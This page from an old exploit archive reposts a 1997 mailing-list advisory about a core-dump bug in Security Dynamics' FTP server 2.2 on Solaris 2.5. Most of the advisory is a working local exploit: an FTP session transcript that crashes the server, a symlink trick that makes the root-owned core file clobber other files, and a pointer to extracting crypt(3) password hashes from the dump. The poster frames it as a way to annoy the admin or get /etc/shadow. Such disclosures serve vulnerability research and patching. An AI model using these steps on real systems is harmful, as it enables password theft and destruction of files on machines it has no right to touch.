Security Dynamics FTP server core problem
|Description:||It is possible to cause this server to dump core while ftping in. The core file will clobber files and also contains crypt(3)ed passwords.|
|Compromise:|| root (local)|
|Vulnerable Systems:||Solaris 2.5 running Security Dynamics' FTP server (Version 2.2) perhaps other versions.|
|Date:||12 November 1997|
Date: Wed, 12 Nov 1997 11:56:29 -0500
From: sp00n <sp00n@COUPLER.300BAUD.COM>
Subject: BoS: Bug In Security Dynamics' FTP server (Version 2.2)
This bug is similar to the solaris and other ftp core dump bugs, slightly
diffrent though. BTW the machine is a SPARC 20 running 2.5, You can link
files and clobber them with a core to annoy your local sys admin or, even
better get /etc/shadow, u get the point... anyways
220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
Name (.:joeuser): joeuser
331 Password required for mpotter.
230 User joeuser logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> user root DUMP_CORE_FTPD
331 Password required for root.
530 Login incorrect.
ftp> quote pasv
421 Service not available, remote server has closed connection
$ ls -la core
-rw-r----- 1 root network 264656 Nov 12 11:14 core
At least it dosent dump 666 like solaris's in.ftpd :) But I cant read it
Not too usefull You say? welp prior to dumping the core you should link it
to ps_data or something like that then you will get this
lrwxrwxrwx 1 joeuser network 7 Nov 12 11:07 core -> ps_data
-rw-rw-r-- 1 root sys 264656 Nov 12 11:07 ps_data
ps_data: ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'
$strings core | more
[ Junk cut --Fyodor ]
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: